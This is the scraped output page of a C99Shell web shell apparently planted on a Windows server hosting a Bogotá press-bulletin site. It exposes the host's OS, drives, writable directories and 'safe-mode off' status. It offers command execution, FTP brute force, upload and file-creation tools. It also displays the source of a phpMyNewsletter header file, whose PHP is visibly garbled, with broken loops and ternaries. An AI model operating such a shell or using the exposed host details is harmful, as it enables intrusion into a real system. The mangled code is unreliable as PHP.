!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\boletinprensa\admin\include\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.45%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     pageheader.inc.php (3.11 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php header("Content-type: text/html; charset=utf-8"); ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
  <head>

<title>phpMyNewsletter v<?php echo $PMNL_VERSION" > ".$page?>
</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />


  <link rel="stylesheet" href="../phpmynewsletter.css" type="text/css" />
  <link rel="stylesheet" href="admin.css" type="text/css" />

  </head>

<body <?php if($page=="config") echo "onload=\"checkSMTP()\"";?> >


<div id='pmnl_version'><img src='../img/button_pmnl.png' alt='logo pmnl' title='powered by phpMyNewsletter' border='0' /> v<?php echo $PMNL_VERSION?></div>
    
<div id="header">
<ul id="menu">
<li <?php if($page=="subscribers" || empty($page)) echo "class=\"actif\" " ?>id="menuSubscriber"><a href="?page=subscribers&amp;list_id=<?php echo $list_id;?>"><?php echo translate("MENU_SUBSCRIBERS"); ?></a></li>
<li <?php if($page=="compose") echo "class=\"actif\" " ?>id="menuCompose"><a href="?page=compose&amp;list_id=<?php echo $list_id;?>"><?php echo translate("MENU_COMPOSE"); ?></a></li>
<li <?php if($page=="archives") echo "class=\"actif\" " ?>  id="menuArchive"><a href="?page=archives&amp;list_id=<?php echo $list_id;?>"><?php echo translate("MENU_ARCHIVES"); ?></a></li>
<li <?php if($page=="newsletterconf") echo "class=\"actif\" " ?>  id="menuNewsletter"><a href="?page=newsletterconf&amp;list_id=<?php echo $list_id;?>"><?php echo translate("MENU_NEWSLETTER"); ?></a></li>
<li <?php if($page=="config") echo "class=\"actif\" " ?>   id="menuConfig"><a href="?page=config&amp;list_id=<?php echo $list_id;?>"><?php echo translate("MENU_CONFIG"); ?></a></li>
<li id="menuLogout"> <a href="logout.php" ><?php echo translate("MENU_LOGOUT"); ?></a></li>

    </ul>

</div>
<div id="main">
    <ul id="submenu">
    <li>
    <?php
if(!empty($list_id) && $page!="config"){
  echo 
"\t<form class='newsletter-list' action='index.php' method='post' name='selected_newsletter'>\n";
  echo 
translate("SELECTED_NEWSLETTER").":";
  
  echo 
"\t\t<select name='list_id' onchange='document.selected_newsletter.submit()'>\n";
  for(
$i=0$i<sizeof($list); $i++){
    echo 
"\t\t\t<option value='".$list[$i][0]."' ";
    if(
$list_id==$list[$i][0]) echo "selected='selected' ";
    echo 
">".$list[$i][1]."</option>\n";
  }
  echo 
"\t\t</select>&nbsp;\n";
  echo 
"\t\t<input type='submit' value=' O K ' />&nbsp;\n";
  echo 
" | <strong>".$list_total_subscribers." ".translate(($list_total_subscribers>"NEWSLETTER_TOTAL_SUBSCRIBERS" :  "NEWSLETTER_TOTAL_SUBSCRIBER"))."</strong>";


  echo 
"\t\t<input type='hidden' name='page' value='$page' />";
  echo 
"\t</form>\n";
  echo 
"    </li></ul>
"
;
}
elseif(
$list_name==-1){
echo
"        </li>

    </ul>"
;
  
$error_list=true;
}
elseif(empty(
$list) && $page!="newsletterconf" && $page != "config"){
 echo 
"</li>
    
    </ul>"
;
    
    echo  
error_msg(translate("ERROR_NO_NEWSLETTER_CREATE_ONE").".");
    
$error_list=true;
include(
"include/pagefooter.inc.php");
exit();
}
else {
 echo 
"</li>


    </ul>"
;
   
    
}

?>

    



:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--